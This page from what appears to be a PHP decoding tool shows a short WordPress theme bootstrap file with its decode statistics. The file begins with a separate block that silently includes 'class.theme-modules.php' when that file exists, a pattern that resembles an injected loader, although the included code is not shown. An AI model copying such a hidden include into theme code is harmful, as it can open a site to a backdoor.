Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirnam..
Decoded Output download
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
define('RZ_VERIFIED', true);
/*
* call the framework
*
*/
require get_template_directory() . '/includes/autoload.php';
?>
Did this file decode correctly?
Original Code
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
define('RZ_VERIFIED', true);
/*
* call the framework
*
*/
require get_template_directory() . '/includes/autoload.php';
Function Calls
dirname | 2 |
file_exists | 1 |
Stats
MD5 | e6130ebc601d64ee87990df417ccf494 |
Eval Count | 0 |
Decode Time | 58 ms |